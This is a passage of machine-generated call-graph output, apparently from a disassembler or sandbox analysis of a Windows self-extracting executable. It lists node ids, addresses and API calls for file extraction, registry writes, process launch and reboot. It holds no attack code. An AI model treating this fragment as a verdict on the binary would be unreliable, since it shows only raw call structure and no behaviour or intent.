944cc0 GlobalFree 2353 946f40 SetUnhandledExceptionFilter 3200 944bc0 3202 944c05 3200->3202 3203 944bd7 3200->3203 3201 944c1b SetFilePointer 3201->3203 3202->3201 3202->3203 3204 9430c0 3205 9430de CallWindowProcA 3204->3205 3206 9430ce 3204->3206 3207 9430da 3205->3207 3206->3205 3206->3207 3208 9463c0 3209 946407 3208->3209 3210 94658a CharPrevA 3209->3210 3211 946415 CreateFileA 3210->3211 3212 946448 WriteFile 3211->3212 3213 94643a 3211->3213 3214 946465 CloseHandle 3212->3214 3216 946ce0 4 API calls 3213->3216 3214->3213 3217 94648f 3216->3217 3218 943100 3219 9431b0 3218->3219 3220 943111 3218->3220 3221 9431b9 SendDlgItemMessageA 3219->3221 3224 943141 3219->3224 3223 943149 GetDesktopWindow 3220->3223 3226 94311d 3220->3226 3221->3224 3222 943138 EndDialog 3222->3224 3225 9443d0 11 API calls 3223->3225 3227 94315d 6 API calls 3225->3227 3226->3222 3226->3224 3227->3224 3228 944200 3229 94421e 3228->3229 3230 94420b SendMessageA 3228->3230 3230->3229 3231 946c03 3232 946c17 _exit 3231->3232 3233 946c1e 3231->3233 3232->3233 3234 946c27 _cexit 3233->3234 3235 946c32 3233->3235 3234->3235 3236 9469b0 3237 9469b5 3236->3237 3245 946fbe GetModuleHandleW 3237->3245 3239 9469c1 __set_app_type __p__fmode __p__commode 3240 9469f9 3239->3240 3241 946a02 __setusermatherr 3240->3241 3242 946a0e 3240->3242 3241->3242 3247 9471ef _controlfp 3242->3247 3244 946a13 3246 946fcf 3245->3246 3246->3239 3247->3244 3248 9434f0 3249 943504 3248->3249 3250 9435b8 3248->3250 3249->3250 3251 9435be GetDesktopWindow 3249->3251 3252 94351b 3249->3252 3253 943526 3250->3253 3254 943671 EndDialog 3250->3254 3255 9443d0 11 API calls 3251->3255 3256 94354f 3252->3256 3257 94351f 3252->3257 3254->3253 3258 9435d6 3255->3258 3256->3253 3260 943559 ResetEvent 3256->3260 3257->3253 3259 94352d TerminateThread EndDialog 3257->3259 3261 9435e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3258->3261 3262 94361d SetWindowTextA CreateThread 3258->3262 3259->3253 3263 9444b9 20 API calls 3260->3263 3261->3262 3262->3253 3264 943646 3262->3264 3265 943581 3263->3265 3266 9444b9 20 API calls 3264->3266 3267 94359b SetEvent 3265->3267 3269 94358a SetEvent 3265->3269 3266->3250 3268 943680 4 API calls 3267->3268 3268->3250 3269->3253 3270 946ef0 3271 946f2d 3270->3271 3272 946f02 3270->3272 3272->3271 3273 946f27 ?terminate@ 3272->3273 3273->3271 3274 947270 _except_handler4_common 2354 944ca0 GlobalAlloc 2355 946a60 2372 947155 2355->2372 2357 946a65 2358 946a76 GetStartupInfoW 2357->2358 2359 946a93 2358->2359 2360 946aa8 2359->2360 2361 946aaf Sleep 2359->2361 2362 946ac7 _amsg_exit 2360->2362 2364 946ad1 2360->2364 2361->2359 2362->2364 2363 946b13 _initterm 2368 946b2e __IsNonwritableInCurrentImage 2363->2368 2364->2363 2365 946af4 2364->2365 2364->2368 2366 946bd6 _ismbblead 2366->2368 2367 946c1e 2367->2365 2369 946c27 _cexit 2367->2369 2368->2366 2368->2367 2371 946bbe exit 2368->2371 2377 942bfb GetVersion 2368->2377 2369->2365 2371->2368 2373 94717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2372->2373 2374 94717a 2372->2374 2376 9471cd 2373->2376 2374->2373 2375 9471e2 2374->2375 2375->2357 2376->2375 2378 942c50 2377->2378 2379 942c0f 2377->2379 2394 942caa memset memset memset 2378->2394 2379->2378 2381 942c13 GetModuleHandleW 2379->2381 2381->2378 2382 942c22 GetProcAddress 2381->2382 2382->2378 2388 942c34 2382->2388 2384 942c8e 2385 942c97 CloseHandle 2384->2385 2386 942c9e 2384->2386 2385->2386 2386->2368 2388->2378 2392 942c89 2489 941f90 2392->2489 2506 94468f FindResourceA SizeofResource 2394->2506 2397 942d2d CreateEventA SetEvent 2398 94468f 7 API calls 2397->2398 2400 942d57 2398->2400 2399 9444b9 20 API calls 2401 942f06 2399->2401 2402 942d7d 2400->2402 2403 942d5b 2400->2403 2406 946ce0 4 API calls 2401->2406 2405 942e1f 2402->2405 2409 94468f 7 API calls 2402->2409 2404 9444b9 20 API calls 2403->2404 2407 942d6e 2404->2407 2511 945c9e 2405->2511 2410 942c62 2406->2410 2407->2401 2412 942d9f 2409->2412 2410->2384 2435 942f1d 2410->2435 2412->2403 2415 942da3 CreateMutexA 2412->2415 2413 942e30 2413->2399 2414 942e3a 2416 942e52 FindResourceA 2414->2416 2417 942e43 2414->2417 2415->2405 2418 942dbd GetLastError 2415->2418 2421 942e64 LoadResource 2416->2421 2422 942e6e 2416->2422 2537 942390 2417->2537 2418->2405 2420 942dca 2418->2420 2423 942dd5 2420->2423 2424 942dea 2420->2424 2421->2422 2422->2407 2552 9436ee GetVersionExA 2422->2552 2426 9444b9 20 API calls 2423->2426 2425 9444b9 20 API calls 2424->2425 2427 942dff 2425->2427 2429 942de8 2426->2429 2427->2405 2430 942e04 CloseHandle 2427->2430 2429->2430 2430->2401 2434 946517 24 API calls 2434->2407 2436 942f6c 2435->2436 2437 942f3f 2435->2437 2661 945164 2436->2661 2439 942f5f 2437->2439 2641 9451e5 2437->2641 2794 943a3f 2439->2794 2443 943041 2448 946ce0 4 API calls 2443->2448 2444 942f71 2444->2443 2676 9455a0 2444->2676 2450 942c6b 2448->2450 2449 942f86 GetSystemDirectoryA 2451 94658a CharPrevA 2449->2451 2476 9452b6 2450->2476 2452 942fab LoadLibraryA 2451->2452 2453 942ff7 FreeLibrary 2452->2453 2454 942fc0 GetProcAddress 2452->2454 2455 943006 2453->2455 2456 943017 SetCurrentDirectoryA 2453->2456 2454->2453 2457 942fd6 DecryptFileA 2454->2457 2455->2456 2726 94621e GetWindowsDirectoryA 2455->2726 2458 943054 2456->2458 2459 943026 2456->2459 2457->2453 2468 942ff0 2457->2468 2460 943061 2458->2460 2737 943b26 2458->2737 2462 9444b9 20 API calls 2459->2462 2460->2443 2465 94307a 2460->2465 2746 94256d 2460->2746 2467 943037 2462->2467 2470 943098 2465->2470 2757 943ba2 2465->2757 2813 946285 GetLastError 2467->2813 2468->2453 2470->2443 2474 9430af 2470->2474 2815 944169 2474->2815 2477 9452d6 2476->2477 2478 945316 2476->2478 2479 945300 LocalFree LocalFree 2477->2479 2481 9452eb SetFileAttributesA DeleteFileA 2477->2481 2482 945374 2478->2482 2486 94535e SetCurrentDirectoryA 2478->2486 2488 9465e8 4 API calls 2478->2488 2479->2477 2479->2478 2480 94538c 2483 946ce0 4 API calls 2480->2483 2481->2479 2482->2480 3124 941fe1 2482->3124 2485 942c72 2483->2485 2485->2384 2485->2392 2487 942390 13 API calls 2486->2487 2487->2482 2488->2486 2490 941f9f 2489->2490 2491 941f9a 2489->2491 2493 941fc0 2490->2493 2496 9444b9 20 API calls 2490->2496 2497 941fd9 2490->2497 2492 941ea7 15 API calls 2491->2492 2492->2490 2494 941fcf ExitWindowsEx 2493->2494 2495 941ee2 GetCurrentProcess OpenProcessToken 2493->2495 2493->2497 2494->2497 2499 941f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2500 941f0e 2495->2500 2496->2493 2497->2384 2499->2500 2501 941f6b ExitWindowsEx 2499->2501 2503 9444b9 20 API calls 2500->2503 2501->2500 2502 941f1f 2501->2502 2504 946ce0 4 API calls 2502->2504 2503->2502 2505 941f8c 2504->2505 2505->2384 2507 9446b6 2506->2507 2509 942d1a 2506->2509 2508 9446be FindResourceA LoadResource LockResource 2507->2508 2507->2509 2508->2509 2510 9446df memcpy_s FreeResource 2508->2510 2509->2397 2509->2413 2510->2509 2517 945e17 2511->2517 2535 945cc3 2511->2535 2512 945dd0 2516 945dec GetModuleFileNameA 2512->2516 2512->2517 2513 946ce0 4 API calls 2515 942e2c 2513->2515 2514 945ced CharNextA 2514->2535 2515->2413 2515->2414 2516->2517 2518 945e0a 2516->2518 2517->2513 2587 9466c8 2518->2587 2520 946218 2596 946e2a 2520->2596 2523 945e36 CharUpperA 2524 9461d0 2523->2524 2523->2535 2525 9444b9 20 API calls 2524->2525 2526 9461e7 2525->2526 2527 9461f7 ExitProcess 2526->2527 2528 9461f0 CloseHandle 2526->2528 2528->2527 2529 945f9f CharUpperA 2529->2535 2530 945f59 CompareStringA 2530->2535 2531 946003 CharUpperA 2531->2535 2532 94667f IsDBCSLeadByte CharNextA 2532->2535 2533 945edc CharUpperA 2533->2535 2534 9460a2 CharUpperA 2534->2535 2535->2512 2535->2514 2535->2517 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 94658a 2535->2592 2538 9424cb 2537->2538 2541 9423b9 2537->2541 2539 946ce0 4 API calls 2538->2539 2540 9424dc 2539->2540 2540->2407 2541->2538 2542 9423e9 FindFirstFileA 2541->2542 2542->2538 2550 942407 2542->2550 2543 942421 lstrcmpA 2545 942431 lstrcmpA 2543->2545 2546 9424a9 FindNextFileA 2543->2546 2544 942479 2547 942488 SetFileAttributesA DeleteFileA 2544->2547 2545->2546 2545->2550 2548 9424bd FindClose RemoveDirectoryA 2546->2548 2546->2550 2547->2546 2548->2538 2549 94658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2546 2550->2549 2551 942390 5 API calls 2550->2551 2551->2550 2557 943737 2552->2557 2559 94372d 2552->2559 2553 9444b9 20 API calls 2554 9439fc 2553->2554 2555 946ce0 4 API calls 2554->2555 2556 942e92 2555->2556 2556->2401 2556->2407 2567 9418a3 2556->2567 2557->2554 2557->2559 2560 9438a4 2557->2560 2603 9428e8 2557->2603 2559->2553 2559->2554 2560->2554 2560->2559 2561 9439c1 MessageBeep 2560->2561 2562 94681f 10 API calls 2561->2562 2563 9439ce 2562->2563 2564 9439d8 MessageBoxA 2563->2564 2565 9467c9 EnumResourceLanguagesA 2563->2565 2564->2554 2565->2564 2568 9418d5 2567->2568 2574 9419b8 2567->2574 2632 9417ee LoadLibraryA 2568->2632 2569 946ce0 4 API calls 2571 9419d5 2569->2571 2571->2407 2571->2434 2573 9418e5 GetCurrentProcess OpenProcessToken 2573->2574 2575 941900 GetTokenInformation 2573->2575 2574->2569 2576 941918 GetLastError 2575->2576 2577 9419aa CloseHandle 2575->2577 2576->2577 2578 941927 LocalAlloc 2576->2578 2577->2574 2579 941938 GetTokenInformation 2578->2579 2580 9419a9 2578->2580 2581 9419a2 LocalFree 2579->2581 2582 94194e AllocateAndInitializeSid 2579->2582 2580->2577 2581->2580 2582->2581 2585 94196e 2582->2585 2583 941999 FreeSid 2583->2581 2584 941975 EqualSid 2584->2585 2586 94198c 2584->2586 2585->2583 2585->2584 2585->2586 2586->2583 2588 9466d5 2587->2588 2589 9466f3 2588->2589 2591 9466e5 CharNextA 2588->2591 2599 946648 2588->2599 2589->2517 2591->2588 2593 94659b 2592->2593 2593->2593 2594 9465ab 2593->2594 2595 9465b8 CharPrevA 2593->2595 2594->2535 2595->2594 2602 946cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 94621d 2600 946668 2599->2600 2601 94665d IsDBCSLeadByte 2599->2601 2600->2588 2601->2600 2602->2598 2604 942a62 2603->2604 2611 94290d 2603->2611 2605 942a75 2604->2605 2606 942a6e GlobalFree 2604->2606 2605->2560 2606->2605 2608 942955 GlobalAlloc 2608->2604 2609 942968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 942a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 942a80 GlobalUnlock 2611->2612 2613 942773 2611->2613 2612->2604 2614 9428b2 2613->2614 2615 9427a3 CharUpperA CharNextA CharNextA 2613->2615 2616 9428b7 GetSystemDirectoryA 2614->2616 2615->2616 2617 9427db 2615->2617 2618 9428bf 2616->2618 2619 9427e3 2617->2619 2620 9428a8 GetWindowsDirectoryA 2617->2620 2621 9428d2 2618->2621 2622 94658a CharPrevA 2618->2622 2624 94658a CharPrevA 2619->2624 2620->2618 2623 946ce0 4 API calls 2621->2623 2622->2621 2625 9428e2 2623->2625 2626 942810 RegOpenKeyExA 2624->2626 2625->2611 2626->2618 2627 942837 RegQueryValueExA 2626->2627 2628 94285c 2627->2628 2629 94289a RegCloseKey 2627->2629 2630 942867 ExpandEnvironmentStringsA 2628->2630 2631 94287a 2628->2631 2629->2618 2630->2631 2631->2629 2633 941826 GetProcAddress 2632->2633 2634 941890 2632->2634 2636 941889 FreeLibrary 2633->2636 2637 941839 AllocateAndInitializeSid 2633->2637 2635 946ce0 4 API calls 2634->2635 2638 94189f 2635->2638 2636->2634 2637->2636 2640 94185f FreeSid 2637->2640 2638->2573 2638->2574 2640->2636 2642 94468f 7 API calls 2641->2642 2643 9451f9 LocalAlloc 2642->2643 2644 94522d 2643->2644 2645 94520d 2643->2645 2647 94468f 7 API calls 2644->2647 2646 9444b9 20 API calls 2645->2646 2649 94521e 2646->2649 2648 94523a 2647->2648 2650 945262 lstrcmpA 2648->2650 2651 94523e 2648->2651 2652 946285 GetLastError 2649->2652 2654 945272 LocalFree 2650->2654 2655 94527e 2650->2655 2653 9444b9 20 API calls 2651->2653 2660 945223 2652->2660 2656 94524f LocalFree 2653->2656 2658 942f4d 2654->2658 2657 9444b9 20 API calls 2655->2657 2656->2658 2659 945290 LocalFree 2657->2659 2658->2436 2658->2439 2658->2443 2659->2660 2660->2658 2662 94468f 7 API calls 2661->2662 2663 945175 2662->2663 2664 94517a 2663->2664 2665 9451af 2663->2665 2666 9444b9 20 API calls 2664->2666 2667 94468f 7 API calls 2665->2667 2675 94518d 2666->2675 2668 9451c0 2667->2668 2828 946298 2668->2828 2672 9451e1 2672->2444 2673 9451ce 2674 9444b9 20 API calls 2673->2674 2674->2675 2675->2444 2677 94468f 7 API calls 2676->2677 2678 9455c7 LocalAlloc 2677->2678 2679 9455fd 2678->2679 2680 9455db 2678->2680 2682 94468f 7 API calls 2679->2682 2681 9444b9 20 API calls 2680->2681 2683 9455ec 2681->2683 2684 94560a 2682->2684 2685 946285 GetLastError 2683->2685 2686 945632 lstrcmpA 2684->2686 2687 94560e 2684->2687 2711 9455f1 2685->2711 2688 945645 2686->2688 2689 94564b LocalFree 2686->2689 2690 9444b9 20 API calls 2687->2690 2688->2689 2692 945696 2689->2692 2693 94565b 2689->2693 2691 94561f LocalFree 2690->2691 2714 9455f6 2691->2714 2694 94589f 2692->2694 2697 9456ae GetTempPathA 2692->2697 2699 945467 49 API calls 2693->2699 2695 946517 24 API calls 2694->2695 2695->2714 2696 946ce0 4 API calls 2700 942f7e 2696->2700 2698 9456c3 2697->2698 2703 9456eb 2697->2703 2840 945467 2698->2840 2702 945678 2699->2702 2700->2443 2700->2449 2705 945680 2702->2705 2702->2714 2707 945717 GetDriveTypeA 2703->2707 2708 94586c GetWindowsDirectoryA 2703->2708 2703->2714 2706 9444b9 20 API calls 2705->2706 2706->2711 2712 945730 GetFileAttributesA 2707->2712 2724 94572b 2707->2724 2874 94597d GetCurrentDirectoryA SetCurrentDirectoryA 2708->2874 2711->2714 2712->2724 2714->2696 2715 945467 49 API calls 2715->2703 2716 942630 21 API calls 2716->2724 2718 9457c1 GetWindowsDirectoryA 2718->2724 2719 94658a CharPrevA 2721 9457e8 GetFileAttributesA 2719->2721 2720 94597d 34 API calls 2720->2724 2722 9457fa CreateDirectoryA 2721->2722 2721->2724 2722->2724 2723 945827 SetFileAttributesA 2723->2724 2724->2707 2724->2708 2724->2712 2724->2714 2724->2716 2724->2718 2724->2719 2724->2720 2724->2723 2725 945467 49 API calls 2724->2725 2870 946952 2724->2870 2725->2724 2727 946268 2726->2727 2728 946249 2726->2728 2730 94597d 34 API calls 2727->2730 2729 9444b9 20 API calls 2728->2729 2731 94625a 2729->2731 2732 946277 2730->2732 2733 946285 GetLastError 2731->2733 2734 946ce0 4 API calls 2732->2734 2735 94625f 2733->2735 2736 943013 2734->2736 2735->2732 2736->2443 2736->2456 2738 943b2d 2737->2738 2738->2738 2739 943b72 2738->2739 2740 943b53 2738->2740 2941 944fe0 2739->2941 2742 946517 24 API calls 2740->2742 2743 943b70 2742->2743 2744 946298 10 API calls 2743->2744 2745 943b7b 2743->2745 2744->2745 2745->2460 2747 942622 2746->2747 2748 942583 2746->2748 2971 9424e0 GetWindowsDirectoryA 2747->2971 2749 9425e8 RegOpenKeyExA 2748->2749 2750 94258b 2748->2750 2752 9425e3 2749->2752 2753 942609 RegQueryInfoKeyA 2749->2753 2750->2752 2754 94259b RegOpenKeyExA 2750->2754 2752->2465 2755 9425d1 RegCloseKey 2753->2755 2754->2752 2756 9425bc RegQueryValueExA 2754->2756 2755->2752 2756->2755 2758 943bdb 2757->2758 2766 943bec 2757->2766 2759 94468f 7 API calls 2758->2759 2759->2766 2760 943c03 memset 2760->2766 2761 943d13 2762 9444b9 20 API calls 2761->2762 2790 943d26 2762->2790 2763 943f4d 2767 946ce0 4 API calls 2763->2767 2764 94468f 7 API calls 2764->2766 2766->2760 2766->2761 2766->2763 2766->2764 2769 943d7b CompareStringA 2766->2769 2771 943fab 2766->2771 2774 943f46 LocalFree 2766->2774 2775 943f1e LocalFree 2766->2775 2778 943fd7 2766->2778 2780 943cc7 CompareStringA 2766->2780 2791 943e10 2766->2791 2979 941ae8 2766->2979 3019 94202a memset memset RegCreateKeyExA 2766->3019 3045 943fef 2766->3045 2768 943f60 2767->2768 2768->2470 2769->2766 2769->2778 2773 9444b9 20 API calls 2771->2773 2777 943fbe LocalFree 2773->2777 2774->2763 2775->2766 2775->2778 2777->2763 2778->2763 3069 942267 2778->3069 2780->2766 2781 943f92 2783 9444b9 20 API calls 2781->2783 2782 943e1f GetProcAddress 2784 943f64 2782->2784 2782->2791 2785 943fa9 2783->2785 2786 9444b9 20 API calls 2784->2786 2787 943f7c LocalFree 2785->2787 2788 943f75 FreeLibrary 2786->2788 2789 946285 GetLastError 2787->2789 2788->2787 2789->2790 2790->2763 2791->2781 2791->2782 2792 943f40 FreeLibrary 2791->2792 2793 943eff FreeLibrary 2791->2793 3059 946495 2791->3059 2792->2774 2793->2775 2795 94468f 7 API calls 2794->2795 2796 943a55 LocalAlloc 2795->2796 2797 943a6c 2796->2797 2798 943a8e 2796->2798 2799 9444b9 20 API calls 2797->2799 2800 94468f 7 API calls 2798->2800 2802 943a7d 2799->2802 2801 943a98 2800->2801 2803 943ac5 lstrcmpA 2801->2803 2804 943a9c 2801->2804 2805 946285 GetLastError 2802->2805 2807 943b0d LocalFree 2803->2807 2808 943ada 2803->2808 2806 9444b9 20 API calls 2804->2806 2811 942f64 2805->2811 2809 943aad LocalFree 2806->2809 2807->2811 2810 946517 24 API calls 2808->2810 2809->2811 2812 943aec LocalFree 2810->2812 2811->2436 2811->2443 2812->2811 2814 94303c 2813->2814 2814->2443 2816 94468f 7 API calls 2815->2816 2817 94417d LocalAlloc 2816->2817 2818 944195 2817->2818 2819 9441a8 2817->2819 2821 9444b9 20 API calls 2818->2821 2820 94468f 7 API calls 2819->2820 2822 9441b5 2820->2822 2823 9441a6 2821->2823 2824 9441c5 lstrcmpA 2822->2824 2825 9441b9 2822->2825 2823->2443 2824->2825 2826 9441e6 LocalFree 2824->2826 2827 9444b9 20 API calls 2825->2827 2826->2823 2827->2826 2829 94171e _vsnprintf 2828->2829 2839 9462c9 FindResourceA 2829->2839 2831 946353 2833 946ce0 4 API calls 2831->2833 2832 9462cb LoadResource LockResource 2832->2831 2835 9462e0 2832->2835 2834 9451ca 2833->2834 2834->2672 2834->2673 2836 946355 FreeResource 2835->2836 2837 94631b FreeResource 2835->2837 2836->2831 2838 94171e _vsnprintf 2837->2838 2838->2839 2839->2831 2839->2832 2841 94551a 2840->2841 2842 94548a 2840->2842 2912 9458c8 2841->2912 2901 9453a1 2842->2901 2844 945581 2848 946ce0 4 API calls 2844->2848 2847 945495 2847->2844 2851 9454c2 GetSystemInfo 2847->2851 2852 94550c 2847->2852 2853 94559a 2848->2853 2849 94554d 2849->2844 2858 94597d 34 API calls 2849->2858 2850 94553b CreateDirectoryA 2854 945577 2850->2854 2855 945547 2850->2855 2860 9454da 2851->2860 2856 94658a CharPrevA 2852->2856 2853->2714 2864 942630 GetWindowsDirectoryA 2853->2864 2857 946285 GetLastError 2854->2857 2855->2849 2856->2841 2859 94557c 2857->2859 2861 94555c 2858->2861 2859->2844 2860->2852 2862 94658a CharPrevA 2860->2862 2861->2844 2863 945568 RemoveDirectoryA 2861->2863 2862->2852 2863->2844 2865 94265e 2864->2865 2866 94266f 2864->2866 2867 9444b9 20 API calls 2865->2867 2868 946ce0 4 API calls 2866->2868 2867->2866 2869 942687 2868->2869 2869->2703 2869->2715 2871 9469a1 2870->2871 2872 94696e GetDiskFreeSpaceA 2870->2872 2871->2724 2872->2871 2873 946989 MulDiv 2872->2873 2873->2871 2875 9459dd GetDiskFreeSpaceA 2874->2875 2876 9459bb 2874->2876 2878 945ba1 memset 2875->2878 2879 945a21 MulDiv 2875->2879 2877 9444b9 20 API calls 2876->2877 2880 9459cc 2877->2880 2881 946285 GetLastError 2878->2881 2879->2878 2882 945a50 GetVolumeInformationA 2879->2882 2883 946285 GetLastError 2880->2883 2884 945bbc GetLastError FormatMessageA 2881->2884 2885 945ab5 SetCurrentDirectoryA 2882->2885 2886 945a6e memset 2882->2886 2898 9459d1 2883->2898 2887 945be3 2884->2887 2895 945acc 2885->2895 2888 946285 GetLastError 2886->2888 2889 9444b9 20 API calls 2887->2889 2890 945a89 GetLastError FormatMessageA 2888->2890 2892 945bf5 SetCurrentDirectoryA 2889->2892 2890->2887 2891 945b94 2893 946ce0 4 API calls 2891->2893 2892->2891 2894 945c11 2893->2894 2894->2703 2896 945b0a 2895->2896 2899 945b20 2895->2899 2897 9444b9 20 API calls 2896->2897 2897->2898 2898->2891 2899->2891 2924 94268b 2899->2924 2905 9453bf 2901->2905 2902 94171e _vsnprintf 2902->2905 2903 94658a CharPrevA 2904 9453fa RemoveDirectoryA GetFileAttributesA 2903->2904 2904->2905 2906 94544f CreateDirectoryA 2904->2906 2905->2902 2905->2903 2907 945415 GetTempFileNameA 2905->2907 2906->2907 2908 94543a 2906->2908 2907->2908 2909 945429 DeleteFileA CreateDirectoryA 2907->2909 2910 946ce0 4 API calls 2908->2910 2909->2908 2911 945449 2910->2911 2911->2847 2913 9458d8 2912->2913 2913->2913 2914 9458df LocalAlloc 2913->2914 2915 9458f3 2914->2915 2916 945919 2914->2916 2917 9444b9 20 API calls 2915->2917 2919 94658a CharPrevA 2916->2919 2923 945906 2917->2923 2918 946285 GetLastError 2920 945534 2918->2920 2921 945931 CreateFileA LocalFree 2919->2921 2920->2849 2920->2850 2922 94595b CloseHandle GetFileAttributesA 2921->2922 2921->2923 2922->2923 2923->2918 2923->2920 2925 9426e5 2924->2925 2926 9426b9 2924->2926 2927 9426ea 2925->2927 2930 94271f 2925->2930 2928 94171e _vsnprintf 2926->2928 2929 94171e _vsnprintf 2927->2929 2932 9426cc 2928->2932 2933 9426fd 2929->2933 2931 9426e3 2930->2931 2934 94171e _vsnprintf 2930->2934 2935 946ce0 4 API calls 2931->2935 2936 9444b9 20 API calls 2932->2936 2937 9444b9 20 API calls 2933->2937 2938 942735 2934->2938 2939 94276d 2935->2939 2936->2931 2937->2931 2940 9444b9 20 API calls 2938->2940 2939->2891 2940->2931 2942 94468f 7 API calls 2941->2942 2943 944ff5 FindResourceA LoadResource LockResource 2942->2943 2944 945020 2943->2944 2945 94515f 2943->2945 2946 945057 2944->2946 2947 945029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2944->2947 2945->2743 2963 944efd 2946->2963 2947->2946 2950 945060 2952 9444b9 20 API calls 2950->2952 2951 94507c 2953 945106 2951->2953 2954 9450e8 2951->2954 2958 945075 2952->2958 2956 945110 FreeResource 2953->2956 2957 94511d 2953->2957 2955 9444b9 20 API calls 2954->2955 2955->2958 2956->2957 2959 94513a 2957->2959 2960 945129 2957->2960 2958->2953 2959->2945 2962 94514c SendMessageA 2959->2962 2961 9444b9 20 API calls 2960->2961 2961->2959 2962->2945 2964 944f4a 2963->2964 2965 944980 25 API calls 2964->2965 2970 944fa1 2964->2970 2968 944f67 2965->2968 2966 946ce0 4 API calls 2967 944fc6 2966->2967 2967->2950 2967->2951 2969 944b60 FindCloseChangeNotification 2968->2969 2968->2970 2969->2970 2970->2966 2972 942510 2971->2972 2973 94255b 2971->2973 2974 94658a CharPrevA 2972->2974 2975 946ce0 4 API calls 2973->2975 2976 942522 WritePrivateProfileStringA _lopen 2974->2976 2977 942569 2975->2977 2976->2973 2978 942548 _llseek _lclose 2976->2978 2977->2752 2978->2973 2980 941b25 2979->2980 3083 941a84 2980->3083 2982 941b57 2983 94658a CharPrevA 2982->2983 2985 941b8c 2982->2985 2983->2985 2984 9466c8 2 API calls 2986 941bd1 2984->2986 2985->2984 2987 941d73 2986->2987 2988 941bd9 CompareStringA 2986->2988 2990 9466c8 2 API calls 2987->2990 2988->2987 2989 941bf7 GetFileAttributesA 2988->2989 2991 941d53 2989->2991 2992 941c0d 2989->2992 2993 941d7d 2990->2993 2996 9444b9 20 API calls 2991->2996 2992->2991 2998 941a84 2 API calls 2992->2998 2994 941d81 CompareStringA 2993->2994 2995 941df8 LocalAlloc 2993->2995 2994->2995 3005 941d9b 2994->3005 2995->2991 2997 941e0b GetFileAttributesA 2995->2997 3016 941cc2 2996->3016 2999 941e1d 2997->2999 3018 941e45 2997->3018 3000 941c31 2998->3000 2999->3018 3002 941c50 LocalAlloc 3000->3002 3009 941a84 2 API calls 3000->3009 3001 941e89 3004 946ce0 4 API calls 3001->3004 3002->2991 3003 941c67 GetPrivateProfileIntA GetPrivateProfileStringA 3002->3003 3011 941cf8 3003->3011 3003->3016 3008 941ea1 3004->3008 3005->3005 3010 941dbe LocalAlloc 3005->3010 3008->2766 3009->3002 3010->2991 3012 941de1 3010->3012 3014 941d23 3011->3014 3015 941d09 GetShortPathNameA 3011->3015 3013 94171e _vsnprintf 3012->3013 3013->3016 3017 94171e _vsnprintf 3014->3017 3015->3014 3016->3001 3017->3016 3089 942aac 3018->3089 3020 942256 3019->3020 3021 94209a 3019->3021 3022 946ce0 4 API calls 3020->3022 3024 94171e _vsnprintf 3021->3024 3026 9420dc 3021->3026 3023 942263 3022->3023 3023->2766 3025 9420af RegQueryValueExA 3024->3025 3025->3021 3025->3026 3027 9420e4 RegCloseKey 3026->3027 3028 9420fb GetSystemDirectoryA 3026->3028 3027->3020 3029 94658a CharPrevA 3028->3029 3030 94211b LoadLibraryA 3029->3030 3031 94212e GetProcAddress FreeLibrary 3030->3031 3032 942179 GetModuleFileNameA 3030->3032 3031->3032 3033 94214e GetSystemDirectoryA 3031->3033 3034 9421de RegCloseKey 3032->3034 3037 942177 LocalAlloc 3032->3037 3035 942165 3033->3035 3033->3037 3034->3020 3036 94658a CharPrevA 3035->3036 3036->3037 3039 9421ec 3037->3039 3040 9421cd 3037->3040 3042 94171e _vsnprintf 3039->3042 3041 9444b9 20 API calls 3040->3041 3041->3034 3043 942218 RegSetValueExA RegCloseKey LocalFree 3042->3043 3043->3020 3046 944016 CreateProcessA 3045->3046 3057 944106 3045->3057 3047 9440c4 3046->3047 3048 944041 WaitForSingleObject GetExitCodeProcess 3046->3048 3050 946285 GetLastError 3047->3050 3053 944070 3048->3053 3049 946ce0 4 API calls 3051 944117 3049->3051 3052 9440c9 GetLastError FormatMessageA 3050->3052 3051->2766 3055 9444b9 20 API calls 3052->3055 3116 94411b 3053->3116 3055->3057 3056 944096 CloseHandle CloseHandle 3056->3057 3058 9440ba 3056->3058 3057->3049 3058->3057 3060 9464c2 3059->3060 3061 94658a CharPrevA 3060->3061 3062 9464d8 GetFileAttributesA 3061->3062 3063 946501 LoadLibraryA 3062->3063 3064 9464ea 3062->3064 3066 946508 3063->3066 3064->3063 3065 9464ee LoadLibraryExA 3064->3065 3065->3066 3067 946ce0 4 API calls 3066->3067 3068 946513 3067->3068 3068->2791 3070 942381 3069->3070 3071 942289 RegOpenKeyExA 3069->3071 3072 946ce0 4 API calls 3070->3072 3071->3070 3073 9422b1 RegQueryValueExA 3071->3073 3074 94238c 3072->3074 3075 942374 RegCloseKey 3073->3075 3076 9422e6 memset GetSystemDirectoryA 3073->3076 3074->2763 3075->3070 3077 942321 3076->3077 3078 94230f 3076->3078 3080 94171e _vsnprintf 3077->3080 3079 94658a CharPrevA 3078->3079 3079->3077 3081 94233f RegSetValueExA 3080->3081 3081->3075 3084 941a9a 3083->3084 3086 941aaf 3084->3086 3087 941aba 3084->3087 3102 94667f 3084->3102 3086->3087 3088 94667f 2 API calls 3086->3088 3087->2982 3088->3086 3090 942ad4 GetModuleFileNameA 3089->3090 3091 942be6 3089->3091 3101 942b02 3090->3101 3092 946ce0 4 API calls 3091->3092 3094 942bf5 3092->3094 3093 942af1 IsDBCSLeadByte 3093->3101 3094->3001 3095 942b11 CharNextA CharUpperA 3098 942b8d CharUpperA 3095->3098 3095->3101 3096 942bca CharNextA 3097 942bd3 CharNextA 3096->3097 3097->3101 3098->3101 3100 942b43 CharPrevA 3100->3101 3101->3091 3101->3093 3101->3095 3101->3096 3101->3097 3101->3100 3107 9465e8 3101->3107 3103 946689 3102->3103 3104 9466a5 3103->3104 3105 946648 IsDBCSLeadByte 3103->3105 3106 946697 CharNextA 3103->3106 3104->3084 3105->3103 3106->3103 3108 9465f4 3107->3108 3108->3108 3109 9465fb CharPrevA 3108->3109 3110 946611 CharPrevA 3109->3110 3111 94661e 3110->3111 3112 94660b 3110->3112 3113 946634 CharNextA 3111->3113 3114 946627 CharPrevA 